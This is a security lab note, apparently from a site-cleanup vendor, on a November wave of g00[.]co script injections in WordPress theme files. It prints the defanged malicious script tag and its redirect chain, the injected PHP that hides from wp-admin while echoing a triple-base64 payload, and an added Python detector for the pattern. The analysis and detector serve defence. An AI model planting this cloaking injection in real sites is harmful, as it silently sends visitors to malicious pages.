New Wave of g00 Script Injections

Labs Note

Active over the past summer, the g00[.]co script injections have returned with a new wave of infections this November.

The most common variation is:

<script src="hxxp: / / g00[.]co/BtFVPd"></script>

This short URL resolves to the hxxp://yourjavascript[.]com/3921156982/not.js script, which in turn opens hxxp://speedclick[.]info/app/amung.php?c=a&s= for visitors who arrive from Facebook, Google, Bing and Yahoo!

On the server side, the malware is mainly injected into WordPress theme files. You can usually find the following PHP code (originally on one line; line breaks added for readability) in either footer.php or functions.php:

// "UkVRVUVTVF9VUkk=" decodes to REQUEST_URI, "d3AtYWRtaW4=" decodes to wp-admin
if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")],
base64_decode("d3AtYWRtaW4=")) === false)
{
// triple base64-encoded payload: the <script> tag pointing at g00[.]co
echo base64_decode(base64_decode(base64_decode("VUVoT2Ft...skipped...edUFEwSw0K")));
}

It injects the g00 script into every page whose URL doesn't contain wp-admin, so the payload stays out of the WordPress admin area.
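A small detector for this pattern, added here as an example and not part of the original note or any Sucuri tooling: it pulls every base64 literal out of a PHP theme file, peels the nested encoding layers, and flags the combination of a REQUEST_URI/wp-admin check with an echoed, multi-layer-encoded script tag. The sample footer.php fragment is constructed, with the script URL defanged.

```python
import base64
import re

# Constructed sample that mirrors the injection: defanged script tag, triple base64.
PAYLOAD = '<script src="hxxp://g00[.]co/BtFVPd"></script>'

def _wrap_base64(data: bytes, layers: int) -> str:
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode()

SAMPLE_PHP = (
    '<?php\n'
    'if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")], '
    'base64_decode("d3AtYWRtaW4=")) === false) {\n'
    '  echo base64_decode(base64_decode(base64_decode("'
    + _wrap_base64(PAYLOAD.encode(), 3) + '")));\n}\n?>\n'
)

# Matches base64_decode("...") calls whose argument is a literal string.
B64_LITERAL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']')
B64_ALPHABET = re.compile(rb'[A-Za-z0-9+/=\s]+')

def peel_base64(literal: str, max_layers: int = 8):
    """Decode repeatedly while the result still looks like base64; return (layers, text)."""
    data = literal.encode()
    layers = 0
    while layers < max_layers:
        try:
            data = base64.b64decode(data, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        layers += 1
        if not B64_ALPHABET.fullmatch(data):
            break  # reached plain text (e.g. REQUEST_URI, wp-admin, <script ...>)
    return layers, data.decode("utf-8", "replace")

def scan_php(source: str):
    """Return one (layers, decoded_text) tuple per base64 literal in the source."""
    return [peel_base64(m.group(1)) for m in B64_LITERAL.finditer(source)]

def is_g00_style_injection(source: str) -> bool:
    """Heuristic: hides from wp-admin AND echoes a nested-encoded <script> tag."""
    findings = scan_php(source)
    decoded = {text for _, text in findings}
    hides_from_admin = "REQUEST_URI" in decoded and "wp-admin" in decoded
    emits_script = any(layers >= 2 and "<script" in text.lower() for layers, text in findings)
    return hides_from_admin and emits_script
```

Run it over footer.php and functions.php of every theme; a positive hit is a strong indicator, and the decoded text tells you exactly what the page would have served.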

As always, if you need site security monitoring and cleanup services, you can count on us.
